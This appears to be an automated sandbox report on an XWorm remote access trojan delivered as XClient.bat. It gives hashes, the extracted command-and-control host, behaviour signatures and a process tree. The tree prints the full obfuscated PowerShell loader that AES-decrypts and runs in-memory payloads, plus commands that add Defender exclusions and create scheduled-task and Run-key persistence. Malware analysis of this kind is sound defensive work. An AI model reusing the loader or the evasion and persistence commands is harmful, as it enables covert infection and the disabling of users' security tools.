Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
31-05-2024 11:46
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win11-20240508-en
General
-
Target
XClient.bat
-
Size
306KB
-
MD5
5f114fbb47589f072b2329adeab0e2d7
-
SHA1
1572da87baa2fcd945be9ca5073cf2c27a5e4eda
-
SHA256
976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1
-
SHA512
4ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69
-
SSDEEP
6144:rCIqB5Xma5qnV7R+N8ymXO55y6wXYjuvgfazxjjNzMGryBNYqi/v:rJqnheT68ym6vfazxDyBiX
Malware Config
Extracted
xworm
19.ip.gl.ply.gg:38173
-
Install_directory
%Userprofile%
-
install_file
Runtime Broker.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1028-48-0x00000211B10D0000-0x00000211B10EC000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 1028 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1028 powershell.exe 1784 powershell.exe 2176 powershell.exe 4204 powershell.exe 1684 powershell.exe 2424 powershell.exe 776 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Runtime Broker.exepid process 4908 Runtime Broker.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRuntime Broker.exepid process 1784 powershell.exe 1784 powershell.exe 2176 powershell.exe 2176 powershell.exe 1028 powershell.exe 1028 powershell.exe 4204 powershell.exe 4204 powershell.exe 1684 powershell.exe 1684 powershell.exe 2424 powershell.exe 2424 powershell.exe 776 powershell.exe 776 powershell.exe 1028 powershell.exe 4908 Runtime Broker.exe 4908 Runtime Broker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1784 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeIncreaseQuotaPrivilege 2176 powershell.exe Token: SeSecurityPrivilege 2176 powershell.exe Token: SeTakeOwnershipPrivilege 2176 powershell.exe Token: SeLoadDriverPrivilege 2176 powershell.exe Token: SeSystemProfilePrivilege 2176 powershell.exe Token: SeSystemtimePrivilege 2176 powershell.exe Token: SeProfSingleProcessPrivilege 2176 powershell.exe Token: SeIncBasePriorityPrivilege 2176 powershell.exe Token: SeCreatePagefilePrivilege 2176 powershell.exe Token: SeBackupPrivilege 2176 powershell.exe Token: SeRestorePrivilege 2176 powershell.exe Token: SeShutdownPrivilege 2176 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeSystemEnvironmentPrivilege 2176 powershell.exe Token: SeRemoteShutdownPrivilege 2176 powershell.exe Token: SeUndockPrivilege 2176 powershell.exe Token: SeManageVolumePrivilege 2176 powershell.exe Token: 33 2176 powershell.exe Token: 34 2176 powershell.exe Token: 35 2176 powershell.exe Token: 36 2176 powershell.exe Token: SeIncreaseQuotaPrivilege 2176 powershell.exe Token: SeSecurityPrivilege 2176 powershell.exe Token: SeTakeOwnershipPrivilege 2176 powershell.exe Token: SeLoadDriverPrivilege 2176 powershell.exe Token: SeSystemProfilePrivilege 2176 powershell.exe Token: SeSystemtimePrivilege 2176 powershell.exe Token: SeProfSingleProcessPrivilege 2176 powershell.exe Token: SeIncBasePriorityPrivilege 2176 powershell.exe Token: SeCreatePagefilePrivilege 2176 powershell.exe Token: SeBackupPrivilege 2176 powershell.exe Token: SeRestorePrivilege 2176 powershell.exe Token: SeShutdownPrivilege 2176 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeSystemEnvironmentPrivilege 2176 powershell.exe Token: SeRemoteShutdownPrivilege 2176 powershell.exe Token: SeUndockPrivilege 2176 powershell.exe Token: SeManageVolumePrivilege 2176 powershell.exe Token: 33 2176 powershell.exe Token: 34 2176 powershell.exe Token: 35 2176 powershell.exe Token: 36 2176 powershell.exe Token: SeIncreaseQuotaPrivilege 2176 powershell.exe Token: SeSecurityPrivilege 2176 powershell.exe Token: SeTakeOwnershipPrivilege 2176 powershell.exe Token: SeLoadDriverPrivilege 2176 powershell.exe Token: SeSystemProfilePrivilege 2176 powershell.exe Token: SeSystemtimePrivilege 2176 powershell.exe Token: SeProfSingleProcessPrivilege 2176 powershell.exe Token: SeIncBasePriorityPrivilege 2176 powershell.exe Token: SeCreatePagefilePrivilege 2176 powershell.exe Token: SeBackupPrivilege 2176 powershell.exe Token: SeRestorePrivilege 2176 powershell.exe Token: SeShutdownPrivilege 2176 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeSystemEnvironmentPrivilege 2176 powershell.exe Token: SeRemoteShutdownPrivilege 2176 powershell.exe Token: SeUndockPrivilege 2176 powershell.exe Token: SeManageVolumePrivilege 2176 powershell.exe Token: 33 2176 powershell.exe Token: 34 2176 powershell.exe Token: 35 2176 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 1028 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 1932 wrote to memory of 1784 1932 cmd.exe powershell.exe PID 1932 wrote to memory of 1784 1932 cmd.exe powershell.exe PID 1784 wrote to memory of 2176 1784 powershell.exe powershell.exe PID 1784 wrote to memory of 2176 1784 powershell.exe powershell.exe PID 1784 wrote to memory of 3536 1784 powershell.exe WScript.exe PID 1784 wrote to memory of 3536 1784 powershell.exe WScript.exe PID 3536 wrote to memory of 4688 3536 WScript.exe cmd.exe PID 3536 wrote to memory of 4688 3536 WScript.exe cmd.exe PID 4688 wrote to memory of 1028 4688 cmd.exe powershell.exe PID 4688 wrote to memory of 1028 4688 cmd.exe powershell.exe PID 1028 wrote to memory of 4204 1028 powershell.exe powershell.exe PID 1028 wrote to memory of 4204 1028 powershell.exe powershell.exe PID 1028 wrote to memory of 1684 1028 powershell.exe powershell.exe PID 1028 wrote to memory of 1684 1028 powershell.exe powershell.exe PID 1028 wrote to memory of 2424 1028 powershell.exe powershell.exe PID 1028 wrote to memory of 2424 1028 powershell.exe powershell.exe PID 1028 wrote to memory of 776 1028 powershell.exe powershell.exe PID 1028 wrote to memory of 776 1028 powershell.exe powershell.exe PID 1028 wrote to memory of 3240 1028 powershell.exe schtasks.exe PID 1028 wrote to memory of 3240 1028 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_476_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_476.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_476.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_476.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_476.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_476.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:776
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"6⤵
- Creates scheduled task(s)
PID:3240
-
-
-
-
-
-
C:\Users\Admin\Runtime Broker.exe"C:\Users\Admin\Runtime Broker.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4908
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
944B
MD5d0a4a3b9a52b8fe3b019f6cd0ef3dad6
SHA1fed70ce7834c3b97edbd078eccda1e5effa527cd
SHA25621942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
SHA5121a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b
-
Filesize
944B
MD5e8a7ab7bae6a69946da69507ee7ae7b0
SHA1b367c72fa4948493819e1c32c32239aa6e78c252
SHA256cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272
SHA51289b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683
-
Filesize
944B
MD54914eb0b2ff51bfa48484b5cc8454218
SHA16a7c3e36ce53b42497884d4c4a3bda438dd4374b
SHA2567e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e
SHA51283ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
306KB
MD55f114fbb47589f072b2329adeab0e2d7
SHA11572da87baa2fcd945be9ca5073cf2c27a5e4eda
SHA256976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1
SHA5124ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69
-
Filesize
115B
MD586722163faccab24931ccf4edac53f1e
SHA1f5d2754468b5abb0fcdeba18a9ee0760b2bf8f39
SHA256616b6d73324d3bc1a1f0147f2381b7c75dfa8868f6ee8da518dbece692420991
SHA5126267133dd0d085613222fa6c225761077117adf0a61978580111d219397b8e35c9f9b6971e33da7e67bf023bd080b2ca80bcdbdfbfa74c52789b31bd9e7aede4
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d